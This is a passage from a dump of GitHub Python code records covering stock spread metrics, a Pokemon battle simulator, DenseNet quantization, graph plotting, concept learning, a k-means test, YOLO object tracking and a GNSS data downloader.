all_metric.merge(daily_value, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Quoted_spread_TW, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(min_tick_TW, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Value_weighted_Effective_Spread, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Value_weighted_Effective_Spread_bps, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Value_weighted_Realized_Spread, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Value_weighted_Realized_Spread_bps, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(daily_market_order, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(daily_order, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(num_quote_update, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(num_trades, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(midpoint_TW, on=['stock', 'date'], how='outer')\r\n\r\n return (all_metric, df_trades)\r\n\r\n\r\nimport os\r\n\r\nos.chdir('C:/Users/anche/NZ/trth data/NZALL TAQ')\r\nmetric_list = []\r\ntrades_list = []\r\nfor file in os.listdir('C:/Users/anche/NZ/trth data/NZALL TAQ'):\r\n\r\n try:\r\n\r\n metric_list.append(metric(file)[0])\r\n trades_list.append(metric(file)[1])\r\n except:\r\n print(file)\r\nall_metrics = pd.concat(metric_list)\r\n\r\nall_metrics.to_csv('C:/Users/anche/NZ/tables v2/NZ metric allord.csv')\r\n\r\n\r\nall_trades = pd.concat(trades_list)\r\nall_trades.to_csv('C:/Users/anche/NZ/tables v2/AU trades.csv')\r\n\r\n","repo_name":"Anchee/Paper-2-Does-fee-structure-matter","sub_path":"NZ metric compute.py","file_name":"NZ metric compute.py","file_ext":"py","file_size_in_byte":17286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17062165442","text":"import requests\nimport numpy\nimport time\n\n#Class to store each pokemon for the 
tournament.\nclass Pokemon:\n def __init__(self, pokedex, name = \"\", types = \"\", hp = 0, attack = 0, defense = 0, sataack = 0, sdefense = 0, speed = 0):\n #stats & info\n self.pokedex = pokedex\n self.name = name\n self.types = types\n self.hp = hp\n self.attack = attack\n self.defense = defense\n self.Sattack = sataack\n self.Sdefense = sdefense\n self.speed = speed\n #for combat\n self.fainted = False\n self.currenthp = hp\n def __repr__(self):\n return f\"{self.pokedex}' '{self.name}' '{self.types}' '{self.hp}' '{self.attack}' '{self.defense}' '{self.Sattack}' '{self.Sdefense}' '{self.speed}' '{self.fainted}' '{self.currenthp}\"+ '\\n'\n\n#Check type effectiveness\n#Not Finished\ndef TypeEffectivness(attacktype, defensetype, attack):\n typecheck = {\n 'bug': {'dark': 2.0, 'fairy': 0.5, 'fighting': 0.5, 'fire': 0.5, 'flying': 0.5, 'ghost': 0.5, 'grass': 2.0, 'poison': 0.5, 'psychic': 2.0, 'steel': 0.5},\n 'dark': {'dark': 0.5, 'fairy': 0.5, 'fighting': 0.5, 'ghost': 2.0, 'psychic': 2.0},\n 'dragon': {'dragon': 2.0, 'fairy': 0.5, 'steel': 0.5},\n 'electric': {'dragon': 0.5, 'electric': 0.5, 'flying': 2.0, 'grass': 0.5, 'ground': 0.5, 'water': 2.0},\n 'fairy': {'dark': 2.0, 'dragon': 2.0, 'fighting': 2.0, 'fire': 0.5, 'poison': 0.5, 'steel': 0.5},\n 'fighting': {'bug': 0.5, 'dark': 2.0, 'fairy': 0.5, 'flying': 0.5, 'ghost': 0.5,'ice': 2.0, 'normal': 2.0, 'poison': 0.5, 'psychic': 0.5, 'rock': 2.0, 'steel': 2.0}, \n 'fire': {'bug': 2.0, 'dragon': 0.5, 'fire': 0.5, 'grass': 2.0, 'ice': 0.5, 'rock': 0.5, 'steel': 2.0, 'water': 0.5}, \n 'flying': {'bug': 2.0, 'electric': 0.5, 'fighting': 2.0, 'grass': 2.0, 'rock': 0.5, 'steel': 0.5},\n 'ghost': {'dark': 0.5, 'ghost': 2.0, 'normal': 0.5, 'psychic': 2.0},\n 'grass': {'bug': 0.5, 'dragon': 0.5, 'fire': 0.5, 'flying': 0.5, 'grass': 0.5, 'ground': 2.0, 'poison': 0.5, 'rock': 2.0, 'steel': 0.5, 'water': 2.0},\n 'ground': {'bug': 0.5, 'electric': 2.0, 'fire': 2.0, 'flying': 0.5, 'grass': 0.5, 'poison': 2.0, 'rock': 2.0, 'steel': 2.0},\n 'ice': {'dragon': 2.0, 'fire': 0.5, 'flying': 2.0, 'grass': 2.0, 'ground': 2.0, 'ice': 0.5, 'steel': 0.5, 'water': 0.5},\n 'normal': {'ghost': 0.5, 'rock': 0.5, 'steel': 0.5},\n 'poison': {'fairy': 2.0, 'ghost': 0.5, 'grass': 2.0, 'ground': 0.5, 'poison': 0.5, 'rock': 0.5, 'steel': 0.5},\n 'psychic': {'dark': 0.5, 'fighting': 2.0, 'normal': 2.0, 'poison': 2.0, 'psychic': 0.5, 'steel': 0.5},\n 'rock': {'bug': 2.0, 'fighting': 0.5, 'fire': 2.0, 'flying': 2.0, 'ground': 0.5, 'ice': 2.0, 'steel': 0.5},\n 'steel': {'electric': 0.5, 'fairy': 2.0, 'fire': 0.5, 'ice': 2.0, 'rock': 2.0, 'steel': 0.5, 'water': 0.5},\n 'water': {'electric': 0.5, 'fire': 2.0, 'grass': 0.5, 'ground': 2.0, 'rock': 2.0, 'water': 0.5}\n }\n\n hit = attack\n if defensetype in typecheck[attacktype]:\n #print(\"tipo de ataque: \" + attacktype + '\\n' + \"tipo de defensa: \" + defensetype)\n check = typecheck[attacktype][defensetype]\n if check == 2.0:\n print(\"It's super efective!\")\n hit = (attack * 2)\n else:\n print(\"This will hit like a week noodle...\")\n hit = (attack/2)\n else:\n print(\"It's a normal hit\")\n return hit\n \n\n\n#Selecting contestants at random for tournament\ndef Contestants():\n x = numpy.random.randint(1,151, size = 8)\n return x\n \n\n#Gets pokemon information from pokemonApi\ndef getpokemon(pokenumber):\n url = 'https://pokeapi.co/api/v2/pokemon/'+str(pokenumber)\n response = requests.get(url)\n\n if response.status_code == 200:\n payload = response.json()\n name = payload[\"name\"]\n types = 
payload[\"types\"][0]['type']['name']\n        hp = [stat for stat in payload['stats'] if stat['stat']['name']=='hp'][0]['base_stat']\n        attack = [stat for stat in payload['stats'] if stat['stat']['name']=='attack'][0]['base_stat']\n        defense = [stat for stat in payload['stats'] if stat['stat']['name']=='defense'][0]['base_stat']\n        sattack = [stat for stat in payload['stats'] if stat['stat']['name']=='special-attack'][0]['base_stat']\n        sdefense = [stat for stat in payload['stats'] if stat['stat']['name']=='special-defense'][0]['base_stat']\n        speed = [stat for stat in payload['stats'] if stat['stat']['name']=='speed'][0]['base_stat']\n\n        # Create an instance of the Pokemon class\n        pkmn = Pokemon(pokenumber,name,types,hp,attack,defense,sattack,sdefense,speed)\n        print(pkmn)\n        return pkmn\n\n#Filling pokemon list with the contestants\ndef Pokeindex(index):\n    pokeList = []\n    for x in index:\n        pkmn = getpokemon(x)\n        pokeList.append(pkmn)\n    return pokeList\n\n#Restore current hp to hp value\ndef JoyTreatment(pokeList):\n    for x in pokeList:\n        x.currenthp = x.hp  # reset each contestant's HP to its base value\n    print(\"\\n\" + \"the contestants have been treated by Joy and are ready to fight\" + \"\\n\")\n\n#Pokemon Initiative\ndef Initiative(pokemonA:Pokemon, pokemonB:Pokemon):\n    speedA = pokemonA.speed\n    speedB = pokemonB.speed \n    if speedA > speedB:\n        return pokemonA.name\n    else:\n        return pokemonB.name\n\n\n#Check what stats will be used\ndef HitStat(pkmn1:Pokemon, pkmn2:Pokemon):\n    if pkmn1.Sattack > pkmn1.attack:\n        dmg = TypeEffectivness(pkmn1.types, pkmn2.types, pkmn1.Sattack)\n        hit = (pkmn2.Sdefense - dmg)\n    else:\n        dmg = TypeEffectivness(pkmn1.types, pkmn2.types, pkmn1.attack)\n        hit = (pkmn2.defense - dmg)\n    #check if the attack will be a positive number\n    if hit > 1:\n        return hit\n    else:\n        return 1\n\n\n#damage calcs\ndef Damage(pkmn1:Pokemon, pkmn2:Pokemon):\n    \n    hit = HitStat(pkmn1,pkmn2)\n    pkmn2.currenthp -= hit\n    print(pkmn1.name+\" hits \"+pkmn2.name+\" for \"+str(hit)+\" damage\")\n\n    if pkmn2.currenthp <= 0:\n        pkmn2.fainted = True\n        print(\"==================================|| \"+ pkmn2.name + \" *faints* ||=======================================\")\n    return hit\n    \n#Pokemon combat\ndef PokeCombat(pkmnA:Pokemon, pkmnB:Pokemon, Initiative):\n    x = Initiative\n    y = 0\n    while pkmnA.fainted == False and pkmnB.fainted == False:\n        print(\"=====================================|| Round : \" +str(y)+\" ||==========================================\")\n        time.sleep(0.4)\n        if pkmnA.name == x:\n            hit = Damage(pkmnA, pkmnB)\n            x = pkmnB.name\n        if pkmnB.name == x:\n            hit = Damage(pkmnB, pkmnA)\n            x = pkmnA.name\n        y += 1\n\n#Delete fainted pokemon from the list\ndef deletus(pokeList):\n    NewpokeList = [Pokemon for Pokemon in pokeList if Pokemon.fainted == False]\n    return NewpokeList\n\n# Run the tournament\ndef Tournament(pokeList):\n    n = 0\n    while n in range(len(pokeList)):\n        pokemonA = pokeList[n]\n        n += 1\n        pokemonB = pokeList[n]\n        n += 1\n        firstmove = Initiative(pokemonA, pokemonB)\n        print(firstmove + \" has the advantage and makes the first move\")\n        PokeCombat(pokemonA,pokemonB,firstmove)\n\nif __name__ == '__main__':\n    pokeList = Pokeindex(Contestants())\n    print(\"the contestants have been selected\")\n    while len(pokeList) != 1:\n        Tournament(pokeList)\n        pokeList = deletus(pokeList)\n        JoyTreatment(pokeList)\n        print(\"The contestants still in the tournament are:\"+'\\n')\n        time.sleep(1)\n        print(pokeList)\n    print(\"||==WINNER====WINNER====WINNER====WINNER==|| \"+pokeList[0].name+\" 
||==WINNER====WINNER====WINNER====WINNER==||\")\n\n\n\n\n\n\n","repo_name":"Chrisvimu/PokemonApi","sub_path":"poketest.py","file_name":"poketest.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21832856314","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.datasets import cifar10\nimport numpy as np\n\n# Load CIFAR-10 dataset\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n# Normalize pixel values\nx_train = x_train.astype('float32') / 255.0\nx_test = x_test.astype('float32') / 255.0\n\n# Convert labels to categorical one-hot encoding\nnum_classes = 10\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n# Define the DenseNet-like model\ndef create_densenet_model():\n growth_rate = 12\n num_layers = [6, 12, 24, 16]\n compression_factor = 0.5\n\n inputs = keras.Input(shape=(32, 32, 3))\n x = layers.Conv2D(64, kernel_size=3, padding='same')(inputs)\n\n # Dense blocks with transition layers\n num_blocks = len(num_layers)\n for block in range(num_blocks):\n x = dense_block(x, num_layers[block], growth_rate)\n if block < num_blocks - 1:\n x = transition_layer(x, compression_factor)\n\n # Global average pooling and classification layer\n x = layers.BatchNormalization()(x)\n x = layers.Activation('relu')(x)\n x = layers.GlobalAveragePooling2D()(x)\n x = layers.Dense(256, activation='relu')(x)\n x = layers.Dense(128, activation='relu')(x)\n\n outputs = layers.Dense(num_classes, activation='softmax')(x)\n\n model = keras.Model(inputs=inputs, outputs=outputs)\n return model\n\n# Dense block\ndef dense_block(x, num_layers, growth_rate):\n for _ in range(num_layers):\n y = layers.BatchNormalization()(x)\n y = layers.Activation('relu')(y)\n y = layers.Conv2D(4 * growth_rate, kernel_size=1, padding='same')(y)\n y = layers.BatchNormalization()(y)\n y = layers.Activation('relu')(y)\n y = layers.Conv2D(growth_rate, kernel_size=3, padding='same')(y)\n x = layers.Concatenate()([x, y])\n return x\n\n# Transition layer\ndef transition_layer(x, compression_factor):\n num_channels = int(x.shape[-1] * compression_factor)\n x = layers.BatchNormalization()(x)\n x = layers.Activation('relu')(x)\n x = layers.Conv2D(num_channels, kernel_size=1, padding='same')(x)\n x = layers.AveragePooling2D(pool_size=2, strides=2)(x)\n return x\n\ndef representative_dataset():\n for image in x_test:\n yield [np.expand_dims(image, axis=0)]\n\n# Create the DenseNet-like model\nmodel = create_densenet_model()\n\n# Compile the model\nmodel.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n)\n\n# Train the model\nmodel.fit(x_train, y_train, batch_size=64, epochs=1, validation_data=(x_test, y_test))\n\n# Save the model\nmodel.save('densenet_model.h5')\n\n# Load the model\nloaded_model = keras.models.load_model('densenet_model.h5')\n\n# Evaluate the model accuracy\n_, accuracy = model.evaluate(x_test, y_test)\n_, loaded_accuracy = loaded_model.evaluate(x_test, y_test)\n\nprint('DenseNet Model Accuracy:', accuracy)\nprint('Loaded DenseNet Model Accuracy:', loaded_accuracy)\n\nloaded_model = keras.models.load_model('densenet_model.h5')\n\n# Quantize the model\nquantized_model = tf.keras.models.clone_model(loaded_model)\nquantized_model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nquantized_model.summary()\n\n# 
Quantize the weights\nconverter = tf.lite.TFLiteConverter.from_keras_model(quantized_model)\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = representative_dataset\nquantized_tflite_model = converter.convert()\n\n# Save the quantized model to a file\nwith open('quantized_densenet_model.tflite', 'wb') as f:\n f.write(quantized_tflite_model)\n\n# Load the quantized model\ninterpreter = tf.lite.Interpreter(model_content=quantized_tflite_model)\ninterpreter.allocate_tensors()\n\n# Test the quantized model accuracy\ninput_index = interpreter.get_input_details()[0][\"index\"]\noutput_index = interpreter.get_output_details()[0][\"index\"]\nnum_correct = 0\n\nfor i in range(len(x_test)):\n input_data = x_test[i].reshape(1, 32, 32, 3)\n interpreter.set_tensor(input_index, input_data)\n interpreter.invoke()\n output = interpreter.get_tensor(output_index)\n predicted_label = output.argmax()\n true_label = y_test[i].argmax()\n if predicted_label == true_label:\n num_correct += 1\n\nquantized_accuracy = num_correct / len(x_test)\nprint('Quantized DenseNet Model Accuracy:', quantized_accuracy)\n\n","repo_name":"HymnOfLight/QNNRepair","sub_path":"densenet_train_quantize.py","file_name":"densenet_train_quantize.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73550233744","text":"#run graph.py 10 0.12 13\n\nimport sys\nimport numpy as np\nimport pylab as plt\nimport networkx as nx\nfrom scipy.sparse import lil_matrix\n\nM = int(sys.argv[1])\np = float(sys.argv[2]) \ngamma_max = int(sys.argv[3])\n\nnp.random.seed(574323475)\n\nG = nx.DiGraph()\n#G = nx.Graph()\n\nfor gammastar in range(1, gamma_max):\n\t \n\tunstable = np.random.rand(M) < p \n\tunstable[:2] = False\n\tunstable[-2:] = False\n\t\n\tfor i in xrange(M):\n\t\tG.add_node(i + gammastar*M)\n\t\tif unstable[i]:\n\t\t\tdest = i + np.random.choice([-2, -1, 1, 2])\n\t\t\tG.add_edge(i + gammastar*M, dest + (gammastar+1)*(M)) \n\t\telse:\n\t\t\tG.add_edge(i + gammastar*M, i + (gammastar+1)*(M))\n\n\tfor i in xrange(M):\n\t\tG.add_node(i + (2*gamma_max - gammastar - 1)*M)\n\t\tif unstable[i]: \n\t\t\tdest = i + np.random.choice([-2, -1, 1, 2])\n\t\t\tG.add_edge(i + (2*gamma_max - gammastar - 1)*M, dest + (2*gamma_max - gammastar)*M)\n\t\telse:\n\t\t\tG.add_edge(i + (2*gamma_max - gammastar - 1)*M, i + (2*gamma_max - gammastar)*M)\n \ndef create_pos(M, gamma_max):\n\t\n\tpos = {}\n\t\n\tfor i in xrange(M):\n\t\tfor t in xrange(2*gamma_max):\n\t\t\tpos[t*M + i] = np.array([t - gamma_max, -i])\n\t\t\t\n\treturn pos\n \nposit = create_pos(M, gamma_max)\n\nnx.draw_networkx_nodes(G, pos = posit, node_size = 50, node_color = 'k')\n#nx.draw_networkx_edges(G, pos = posit, edge_color = 'k')\nnx.draw_networkx_edges(G, pos = posit, edge_color = 'r')\n\nax = plt.gca()\n\nax.set_xlim(-gamma_max, gamma_max)\nax.set_ylim(-M, 1)\n\nplt.axvline(0.0, color='g')\nplt.axvline(-gamma_max + 1, color='r')\nplt.axvline(gamma_max - 1, color='r')\n\nplt.axis('off')\n\nplt.subplots_adjust(left = 0.0, right = 1.0)\n\ndef get_P(G, M, gamma):\n\t\n\tP = lil_matrix((M, M))\n\t\n\tfor i in xrange(M):\n\t\tthis_node = M + i\n\t\tfor t in xrange(1, gamma-1):\n\t\t\tthis_node = G.successors(this_node)[0]\n\n\t\tP[np.mod(this_node, M), i] = 1\n\t\n\treturn P\n\nplt.figure(2)\nP = get_P(G, M, 2*gamma_max)\nplt.spy(P.todense())\nax = plt.gca()\nax.set_xticks([])\nax.set_yticks([])\n\nplt.figure(3)\nQ = P.todense()\nR = np.hstack((Q, 
np.zeros_like(Q)))\nS = np.vstack((np.zeros_like(R), R))\nG2 = nx.from_numpy_matrix(S.T, create_using=nx.DiGraph())\n\nnx.draw_networkx_nodes(G2, pos = posit, node_size = 50, node_color = 'k')\nnx.draw_networkx_edges(G2, pos = posit, edge_color = 'r')\nplt.axis('off')\nax = plt.gca()\nax.set_xticks([])\nax.set_yticks([])\nplt.subplots_adjust(left = 0.0, right = 1.0, top = 1.0)\n","repo_name":"davidefiocco/phd-thesis","sub_path":"Thesis_sources/code/WordlinesGraph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"33607478581","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 4 16:19:50 2018\n\n@author: Kiran H T\n\"\"\"\n\nimport csv\ndef satisfy(d,h):\n    for i in range(len(h)):\n        if not (h[i]=='?' or h[i]==d[i]):\n            return False\n    return True\n\ndef specialise(d,g,x):\n    g1=[]\n    for h in g:\n        if satisfy(d,h):\n            for i in range(len(x)):\n                if h[i]!='?':\n                    continue\n                s=x[i]\n                for j in s:\n                    if j==d[i]:\n                        continue\n                    h[i]=j\n                    g1.append(h.copy())\n                    h[i]='?'\n        else:\n            g1.append(h)\n    return g1\n\ndef generalise(d,s,x):\n    for i in range(len(s)):\n        if s[i]=='%':\n            s[i]=d[i]\n            x[i]=x[i].intersection({s[i]})\n        elif s[i]!='?' and s[i]!=d[i]:\n            s[i]='?'\n            x[i]=set()\n    return s\n\nwith open('Training_examples.csv') as csv_file:\n    csv_reader=csv.reader(csv_file,delimiter=',')\n    data=[]\n    for row in csv_reader:\n        data.append(row)\n    \ns=['%']*(len(data[0])-1)\ng=[]\ng.append(['?']*(len(data[0])-1))\nf=True\nx=[]\nfor i in range(len(data[0])-1):\n    x.append(set())\nfor d in data:\n    for i in range(len(d)-1):\n        x[i].add(d[i])\n\nprint(\"S: \",s,\"\\nG: \",g,\"\\n\")\nfor d in data:\n    print(\"Data:\",d)\n    if d[-1]==\"yes\":\n        s=generalise(d,s,x)\n        g1=[]\n        for h in g:\n            if satisfy(d,h):\n                g1.append(h)\n        g=g1\n    else:\n        if satisfy(d,s):\n            f=False\n            break\n        g=specialise(d,g,x)\n        \n    print(\"S: \",s,\"\\nG: \",g,\"\\n\")\nif f==False:\n    print(\"Hypothesis set can't be formed.\")\nelse:\n    print(\"S: \",s,\"\\nG: \",g,\"\\n\")","repo_name":"anbat/m","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8252687129","text":"import collections\nparticipant = [\"marina\", \"josipa\", \"nikola\", \"vinko\", \"filipa\"]\ncompletion = [\"marina\", \"josipa\", \"nikola\", \"filipa\"]\n\n# Sort, then compare / my own solution\ndef solution(participant, completion):\n    answer = ''\n    participant.sort()\n    completion.sort()\n    for i in range(len(completion)):\n        if participant[i] != completion[i]:\n            answer = participant[i]\n            return answer\n            break\n    if answer == '':\n        answer = participant[-1]\n        return answer\n\n\n# Python dictionary (using hash values)\ndef solution1(participant, completion):\n    answer = ''\n    temp = 0\n    dic = {}\n    for part in participant:\n        dic[hash(part)] = part\n        temp += int(hash(part))\n    for com in completion:\n        temp -= hash(com)\n    answer = dic[temp]\n\n    return answer\n\n# Shorter code using the collections library\n# collections.Counter() is an object used to count how many items of the same value a container holds.\n\ndef solution2(participant, completion):\n    answer = collections.Counter(participant) - collections.Counter(completion)\n    return list(answer.keys())[0]\n\n# In Python 3.0 and later, use list(a.keys()) when a list is needed as the return value.\n# dict_keys, dict_values, dict_items, etc. can be used in basic iteration constructs (e.g., for loops) without converting them to a list.\n\nsolution2(participant, 
completion)","repo_name":"pjjoy/python","sub_path":"study_homeworks/hyunjae/algorithm/level1/Exercise02_marathon.py","file_name":"Exercise02_marathon.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11441474942","text":"import logging\nimport os\nimport numpy\nimport tkinter\n\nimport scripts.kmeans_new as kmeans\nimport scripts.display_results as dp\n\ndirname = os.path.dirname(__file__)\n\n\ndef test():\n with open(dirname + '/resources/Table_distances_Essonne_py.txt', 'r') as f:\n dist_table = numpy.array(eval(f.read()))\n\n with open(dirname + '/resources/Liste_pos_Essonne_py.txt', 'r') as f:\n cities = eval(f.read())\n\n with open(dirname + '/resources/liste_essonne_py.txt') as f:\n names = eval(f.read())\n\n results, seeds = kmeans.mykmeans(7, dist_table, True)\n logging.debug('Completed')\n logging.info([res[1] for res in results])\n print([res[1] for res in results])\n for pools, seeds_set in zip(results, seeds):\n dp_main = dp.Main(cities, names)\n dp_main.dispool(pools[0], seeds_set)\n next_btn = tkinter.Button(dp_main.root, text=\"Next\", command=lambda: dp_main.root.destroy())\n next_btn.pack()\n try:\n dp_main.root.mainloop()\n finally:\n pass\n","repo_name":"Patato777/TIPE","sub_path":"scripts/tests/test_kmeans_det_ess.py","file_name":"test_kmeans_det_ess.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28363334263","text":"import cv2\nimport numpy as np\nimport time\nimport norfair\nfrom norfair import Detection, Paths, Tracker, Video\n\n# Load Yolo\n# Make sure you download the right files\n# cfg = \"/Users/isabellafeeney/Desktop/CS 534 CV/YOLO/cfg/yolov4-tiny.cfg\"\n# weights = \"/Users/isabellafeeney/Desktop/CS 534 CV/YOLO/weights/yolov4-tiny.weights\"\n# names = \"/Users/isabellafeeney/Desktop/CS 534 CV/YOLO/coco.names\"\n\ncfg = \"/Users\\layhu\\Desktop\\YOLO-Real-Time-Object-Detection\\cfg\\yolov3.cfg\"\nweights = \"/Users\\layhu\\Desktop\\YOLO-Real-Time-Object-Detection\\weights\\yolov3.weights\"\nnames = \"/Users\\layhu\\Desktop\\YOLO-Real-Time-Object-Detection\\coco.names\"\n\n# Read pre-trained model\nnet = cv2.dnn.readNet(cfg, weights)\n\n# Read classes from the names file\nclasses = []\nwith open(names, \"r\") as f:\n classes = [line.strip() for line in f.readlines()]\n\nlayer_names = net.getLayerNames()\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\n\n# Initalize Tracker\n\n# Distance threshold might be able to be dynamically found\ntracker = Tracker(distance_function=\"mean_euclidean\", distance_threshold=20)\n\n# Read in webcam\ncap = cv2.VideoCapture(0)\n\nfont = cv2.FONT_HERSHEY_PLAIN\nstarting_time = time.time()\nframe_id = 0\nprevObjs = []\nprevBoxes = []\n\ndef get_centroid(detection, height, width):\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n # Rectangle coordinates\n x = int(center_x - w / 1.8)\n y = int(center_y - h / 1.8)\n centroid = ([x, y, w, h])\n return centroid\n\nwhile True:\n _, frame = cap.read()\n frame_id += 1\n\n height, width, channels = frame.shape\n\n # Detecting objects\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\n\n net.setInput(blob)\n outs = net.forward(output_layers)\n\n # Showing 
informations on the screen\n class_ids = []\n confidences = []\n boxes = []\n norfair_detections = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.4:\n # Object detected\n x, y, w, h = get_centroid(detection, height, width)\n boxes.append([x, y, w, h])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n name = (str(classes[class_id]))\n #points = np.array([x,y])\n points = np.array([[x,y],[x+w, y+h]])\n norfair_detections.append(\n Detection(\n # Points detected. Must be a rank 2 array with shape (n_points, n_dimensions) where n_dimensions is 2 or 3.\n points = points,\n #scores = confidence,\n label = name\n )\n )\n\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.4, 0.3)\n\n tracked_objects = tracker.update(detections=norfair_detections)\n\n # Draw centroids boxes\n #norfair.draw_points(frame, norfair_detections)\n norfair.draw_boxes(frame, norfair_detections)\n norfair.draw_tracked_objects(frame, tracked_objects)\n\n # for i in range(len(boxes)):\n # if i in indexes:\n # x, y, w, h = boxes[i]\n # label = str(classes[class_ids[i]])\n # confidence = confidences[i]\n # color = colors[class_ids[i]]\n # cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)\n # cv2.putText(frame, label + \" \" + str(round(confidence, 2)), (x, y + 30), font, 2, color, 2)\n\n # #cv2.putText(frame, 'Center' + \" \" + str(x) + ',' + str(y), (x + 15, y + 60), font, 2, color, 2)\n # for j in range(len(prevObjs)):\n # if j in indexes:\n # prevLabel = str(classes[class_ids[j]])\n # print(\"prevObj \" + prevLabel)\n # print(\"Current box \" + label)\n # if prevLabel == label:\n # print(\"label Found\" + label)\n # a, b, c, d = prevBoxes[j]\n # x, y, w, h = boxes[i]\n # velocity = getVelocity(a, b, x, y)\n # # cv2.putText(frame, 'Center' + \" \" + str(x) + ',' + str(y), (x + 15, y + 60), font, 2, color, 2)\n # cv2.putText(frame, 'Velocity' + \" \" + str(velocity), (x + 15, y + 60), font, 2, color, 2)\n # else:\n # # I don't think this is needed because of the update at the end\n # print(\"No Match\")\n # cv2.putText(frame, label + \" \" + str(round(confidence, 2)), (x, y + 30), font, 2, color, 2)\n # cv2.putText(frame, 'New Object', (x + 15, y + 60), font, 2, color, 2)\n \n \n # Update prevPos with what we currently saw - we just need first two attributes of each entry\n # Okay so we need the label too.... boxes is just the coordinates obviously\n if len(boxes) > 0:\n prevObjs = class_ids\n prevBoxes = boxes\n\n # Goal: Print out on screen Label: Velocity\n #cv2.putText(frame, \"[ObjectLabel]: \" + str(round(fps, 2)), (10, 50), font, 2, (0, 0, 0), 3)\n def getVelocity(x1, y1, x2, y2):\n # Initailze points, can add in depth easily\n point1 = np.array((x1, y1))\n point2 = np.array((x2, y2))\n # Compute euclidian distance. There is possibly a numpy function for this\n dist_moved = np.linalg.norm(point1 - point2)\n # Factor in time elapsed -- modify so we get the time between frames? 
maybe make list of timestamps\n        elapsed_time = time.time() - starting_time\n        spf = elapsed_time/frame_id \n        # Compute velocity -- THIS IS NOT RIGHT\n        velocity = dist_moved/spf\n        return velocity\n\n    elapsed_time = time.time() - starting_time\n    fps = frame_id / elapsed_time\n    cv2.putText(frame, \"FPS: \" + str(round(fps, 2)), (10, 50), font, 2, (0, 0, 0), 3)\n    cv2.imshow(\"Image\", frame)\n    \n    key = cv2.waitKey(1)\n    if key == 27:\n        break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"nvickery/CS549---CV-Project-","sub_path":"Archive/yolo_base.py","file_name":"yolo_base.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"8917792403","text":"#!/usr/bin/env python\n# coding:utf-8\nimport configparser\nimport os\nfrom ftplib import FTP\nfrom urllib import parse\nimport datetime\nimport unlzw\nimport gzip\nimport extractDCBFromSNX\nimport shutil\nimport time\n\nGPST0 = datetime.datetime(1980, 1, 6, 0, 0, 0)\n\n\ndef get_gps_weekday(date):\n    seconds = (date - GPST0).total_seconds()\n    week = int(seconds / 86400 / 7)\n    weekday = int(seconds % (86400 * 7) / 86400)\n    return week, weekday\n\n\ndef is_file_exist(file_path):\n    try:\n        f = open(file_path)\n        f.close()\n        return True\n    except IOError:\n        print(\"file is not accessible.\")\n        return False\n\n\ndef uncompress(file_path, dest_path='', is_delete=False):\n    \"\"\"Uncompress file.\"\"\"\n    if file_path.endswith('.gz'):\n        if dest_path == '':\n            dest_path = file_path.replace('.gz', '')\n        g_file = gzip.GzipFile(file_path)\n        uncompressed_data = g_file.read()\n        g_file.close()\n    elif file_path.endswith('.Z'):\n        if dest_path == '':\n            dest_path = file_path.replace('.Z', '')\n        with open(file_path, 'rb') as f:\n            compressed_data = f.read()\n        uncompressed_data = unlzw.unlzw(compressed_data)\n    with open(dest_path, 'w') as fw:\n        fw.write(uncompressed_data.decode(encoding=\"utf-8\"))\n    if is_delete:\n        os.remove(file_path)\n\n\ndef copy_file(srcfile, dstfile):\n    if not os.path.isfile(srcfile):\n        print(\"%s not exist!\" % srcfile)\n    else:\n        fpath, fname = os.path.split(dstfile)  # split the path into directory and file name\n        if not os.path.exists(fpath):\n            os.makedirs(fpath)  # create the directory\n        